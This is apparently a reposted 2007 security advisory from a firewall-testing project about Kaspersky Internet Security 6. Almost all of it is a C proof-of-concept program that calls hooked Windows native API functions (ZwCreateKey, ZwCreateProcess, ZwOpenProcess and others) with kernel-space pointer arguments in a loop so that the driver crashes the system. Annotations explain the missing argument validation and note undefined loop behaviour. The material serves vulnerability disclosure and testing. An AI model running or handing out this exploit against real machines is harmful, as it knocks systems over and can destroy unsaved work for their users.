Vuln: Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities

原创 2007年09月28日 17:00:00
/*

Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)


Usage:
prog FUNCNAME
FUNCNAME - name of function to be checked

Description:
This program calls given function with parameters that crash the system. This happens because of
insufficient validation of function arguments in the driver of the firewall.

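Test:
Run the testing program with the name of one of the affected functions handled below
(NtCreateKey, NtCreateProcess, NtCreateProcessEx, NtCreateSection, NtCreateSymbolicLinkObject,
NtCreateThread, NtLoadKey2, NtOpenKey, NtOpenProcess; the Zw* spellings are accepted too).
On an affected installation the system crashes; if the calls return, the program prints
"TEST FAILED!".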

*/

#undef __STRICT_ANSI__
#include
#include
#include
#include
#include

/*
 * Function-pointer type for ntdll's ZwCreateProcessEx. main() resolves the
 * function at run time with GetProcAddress() and calls it through this type.
 * The parameter list is the one given here by the author; the last parameter
 * is named "Unknown" in the listing and its meaning is not shown on this page.
 */
typedef NTSTATUS NTAPI (*ZW_CREATE_PROCESS_EX)(OUT PHANDLE ProcessHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes,IN HANDLE InheritFromProcessHandle,IN BOOLEAN InheritHandles,IN HANDLE SectionHandle OPTIONAL,IN HANDLE DebugPort OPTIONAL,IN HANDLE ExceptionPort OPTIONAL,IN ULONG Unknown);


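/*
 * Print the program banner (advisory title, project name, copyright and
 * project URL) to stdout. Takes no arguments and returns nothing.
 */
void about(void)
{
    /* Lines end with the "\n" escape; "/n" would be printed literally as
       slash-n and leave the whole banner on one line. */
    printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)\n");
    printf("Windows Personal Firewall analysis project\n");
    printf("Copyright 2007 by Matousec - Transparent security\n");
    printf("http://www.matousec.com/""\n\n");
}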

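/*
 * Print the command-line synopsis to stdout. Called by main() when the
 * argument count is not exactly one function name.
 */
void usage(void)
{
    /* "\n" (not "/n") so each line of the synopsis ends with a newline. */
    printf("Usage: test FUNCNAME\n"
           " FUNCNAME - name of function to be checked\n");
}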

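/*
 * Entry point of the test program.
 *
 * Expects exactly one argument: the name of a native API function, in either
 * its Nt* or Zw* spelling (compared case-insensitively with stricmp). The
 * selected function is then called in a loop with one pointer argument set to
 * 0x80000000 + i while the remaining arguments stay fixed.
 *
 * Root cause under test (per the header of this file): the firewall driver
 * hooks these SSDT entries and does not sufficiently validate the caller's
 * arguments. 0x80000000 is presumably chosen because, on 32-bit Windows with
 * the default address-space split, it is the first kernel-space address and
 * therefore never a valid user-mode buffer. A hook handler has to treat every
 * such argument as an untrusted user-mode pointer: probe it and access it
 * inside an exception handler before dereferencing.
 *
 * Returns 1 on every path. Output other than the banner means the system
 * survived the calls (or the name was not recognised).
 *
 * NOTE(review): every loop uses `i>=0` as its condition, which only becomes
 * false through signed overflow of `i++`; that is undefined behaviour in C.
 * The loops are kept as published.
 */
int main(int argc,char **argv)
{
    about();

    if (argc!=2)
    {
        usage();
        return 1;
    }

    if (!stricmp(argv[1],"NtCreateKey") || !stricmp(argv[1],"ZwCreateKey"))
    {
        HANDLE handle;

        /* Argument under test: the third one (object attributes pointer). */
        for (int i=0;i>=0;i++)
            ZwCreateKey(&handle,KEY_ALL_ACCESS,(PVOID)(0x80000000+i),0,NULL,0,NULL);

    } else if (!stricmp(argv[1],"NtCreateProcess") || !stricmp(argv[1],"ZwCreateProcess"))
    {
        /* NOTE(review): oa is passed uninitialised; presumably only the
           output-handle pointer matters for this case - confirm. */
        OBJECT_ATTRIBUTES oa;

        /* Argument under test: the first one, cast to PHANDLE (output handle). */
        for (int i=0;i>=0;i++)
            ZwCreateProcess((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL);
    } else if (!stricmp(argv[1],"NtCreateProcessEx") || !stricmp(argv[1],"ZwCreateProcessEx"))
    {
        /* Resolved at run time from ntdll.dll; if the export is missing the
           branch does nothing and control falls through to the failure message. */
        ZW_CREATE_PROCESS_EX ZwCreateProcessEx=(ZW_CREATE_PROCESS_EX)GetProcAddress(GetModuleHandle("ntdll.dll"),"ZwCreateProcessEx");
        if (ZwCreateProcessEx)
        {
            OBJECT_ATTRIBUTES oa;

            /* Argument under test: the first one, cast to PHANDLE. */
            for (int i=0;i>=0;i++)
                ZwCreateProcessEx((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL,0);
        }
    } else if (!stricmp(argv[1],"NtCreateSection") || !stricmp(argv[1],"ZwCreateSection"))
    {
        HANDLE handle;

        /* Argument under test: the POBJECT_ATTRIBUTES pointer. */
        for (int i=0;i>=0;i++)
        {
            POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
            ZwCreateSection(&handle,0,oa,NULL,0,0,NULL);
        }
    } else if (!stricmp(argv[1],"NtCreateSymbolicLinkObject") || !stricmp(argv[1],"ZwCreateSymbolicLinkObject"))
    {
        HANDLE handle;
        OBJECT_ATTRIBUTES oa;

        /* Argument under test: the Buffer field of a UNICODE_STRING whose
           length fields are 0x1000. The same string is used as the object
           name (through oa) and as the last argument. */
        for (int i=0;i>=0;i++)
        {
            UNICODE_STRING us={0x1000,0x1000,(PWSTR)(i+0x80000000)};
            InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
            ZwCreateSymbolicLinkObject(&handle,SYMBOLIC_LINK_ALL_ACCESS,&oa,&us);
        }
    } else if (!stricmp(argv[1],"NtCreateThread") || !stricmp(argv[1],"ZwCreateThread"))
    {
        HANDLE handle;
        CLIENT_ID clid;
        OBJECT_ATTRIBUTES oa;
        USER_STACK us;

        /* Arguments under test: the pointer cast to PCONTEXT; the loop
           counter is also passed as the HANDLE argument. */
        for (int i=0;i>=0;i++)
            ZwCreateThread(&handle,THREAD_ALL_ACCESS,&oa,(HANDLE)i,&clid,(PCONTEXT)(i+0x80000000),&us,FALSE);
    } else if (!stricmp(argv[1],"NtLoadKey2") || !stricmp(argv[1],"ZwLoadKey2"))
    {
        OBJECT_ATTRIBUTES oa2;

        /* Argument under test: the first POBJECT_ATTRIBUTES pointer. */
        for (int i=0;i>=0;i++)
        {
            POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
            ZwLoadKey2(oa,&oa2,REG_NO_LAZY_FLUSH);
        }
    } else if (!stricmp(argv[1],"NtOpenKey") || !stricmp(argv[1],"ZwOpenKey"))
    {
        HANDLE handle;

        /* Argument under test: the POBJECT_ATTRIBUTES pointer. */
        for (int i=0;i>=0;i++)
        {
            POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
            ZwOpenKey(&handle,KEY_ALL_ACCESS,oa);
        }
    } else if (!stricmp(argv[1],"NtOpenProcess") || !stricmp(argv[1],"ZwOpenProcess"))
    {
        HANDLE handle;
        OBJECT_ATTRIBUTES oa;
        UNICODE_STRING us={0x1000,0x1000,NULL};
        InitializeObjectAttributes(&oa,&us,0,NULL,NULL);

        /* Argument under test: the PCLIENT_ID pointer. */
        for (int i=0;i>=0;i++)
        {
            PCLIENT_ID clid=(PVOID)(i+0x80000000);
            ZwOpenProcess(&handle,PROCESS_ALL_ACCESS,&oa,clid);
        }
    } else printf("\nI do not know how to exploit the vulnerability using this function.\n");

    /* Reached only when the calls above returned, i.e. the system did not
       crash, or when the function name was not recognised. "\n" replaces the
       literal "/n" so the message is printed on its own line. */
    printf("\nTEST FAILED!\n");
    return 1;
}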
 
